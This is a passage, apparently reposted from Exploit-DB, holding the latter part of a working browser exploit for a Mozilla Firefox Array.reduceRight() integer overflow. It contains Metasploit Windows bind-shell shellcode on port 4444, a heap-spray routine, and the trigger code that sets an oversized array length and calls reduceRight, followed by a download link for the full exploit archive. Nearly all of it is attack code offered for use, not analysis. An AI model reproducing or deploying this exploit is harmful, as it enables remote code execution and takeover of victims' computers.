NOP / MOV ESP,0x0c0c0c0c // windows/shell_bind_tcp - 341 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process, // InitialAutoRunScript=, AutoRunScript= var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); rop += shell; var tr_padding = unescape("%u0c0c%u0c0c"); while(tr_padding.length < 0x80000) {tr_padding += tr_padding;} var dummy = ptrs + esppadding + rop + tr_padding; var hspray = dummy.substring(0,0x80000 - bheader - nullt); // Allocation of 64 blocks of 1Mb. HeapBlocks = new Array() for (i=0;i<0x40;i++){ HeapBlocks[i] += hspray; } } spray(); hola = new Array; hola.length = 2197815302; // 0x0c000014 beginning of sprayed block w00t = function ph33r(prev, myobj, indx, array) { alert(myobj[0]); // trigger getProperty } hola.reduceRight(w00t,1,2,3); </script> </body> </html> Download: http://www.exploit-db.com/sploits/17974.zip Sursa: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit